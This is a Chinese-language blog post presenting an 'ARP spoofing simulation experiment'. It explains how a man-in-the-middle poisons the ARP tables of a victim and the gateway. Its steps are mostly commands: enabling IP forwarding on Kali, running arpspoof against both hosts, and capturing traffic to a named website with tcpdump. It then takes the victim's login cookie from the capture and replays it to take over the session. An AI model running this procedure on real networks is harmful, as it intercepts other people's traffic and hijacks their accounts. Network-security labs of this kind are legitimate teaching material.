arp欺骗模拟实验

具体arp原理见这篇arp原理

ARP欺骗模拟实验:

例如,用户A想访问赛克社区这个网站,那么中间人如何劫持中间的数据呢?

首先下图是用户A、B、中间人对应的ip和mac。用户想上网必定经过网关,劫持用户A和网关,就可以截取用户上网的数据。

clipboard222.png

欺骗:

中间人---->用户A··我是网关:ip:192.168.27.250 mac:xxx.8c.12
中间人---->B(网关)··我是A:ip:192.168.27.37 mac:xxx.8c.12

欺骗A时,ip地址写网关的,mac地址写自己的。这样在用户A的arp表中对应B的ip的mac就变成了中间人的mac;

同理欺骗B的时候ip写用户A的,mac写自己的,这样就劫持了用户A---B 之间的数据。

如图:本来用户A上网是黑线,arp投毒后就变成了红色的,所有数据中间人都可以抓取。

模拟投毒过程:

kali:

查看arp表:
arp -a

step1:中间人开启路由转发功能(1--转发;0--不转发)
echo '1'>/proc/sys/net/ipv4/ip_forward

step2:投毒--欺骗A,我是B
arpspoof -i eth0 -t 192.168.27.37 192.168.27.250 
投毒--欺骗B,我是A
arpspoof -i eth0 -t 192.168.27.250 192.168.27.37

step3:欺骗者A上网访问zone.secevery.com,抓包106.75.15.117是zone.secevery.com的ip
tcpdump -Av -c200 dst 106.75.15.117

第一步:开启路由转发功能

clipboard.png

第二步:欺骗网关

clipboard2.png

第三步:欺骗用户A

clipboard3.png

第四步:中间人tcpdump抓包

clipboard4.png

A用户上网访问http://zone.secevery.com/并登录,提取包中的数据--cookie

clipboard5.png

第五步:在浏览器中打开zone.secevery.com,替换cookie值,刷新,登录成功。

clipboard6.png

标签: none

添加新评论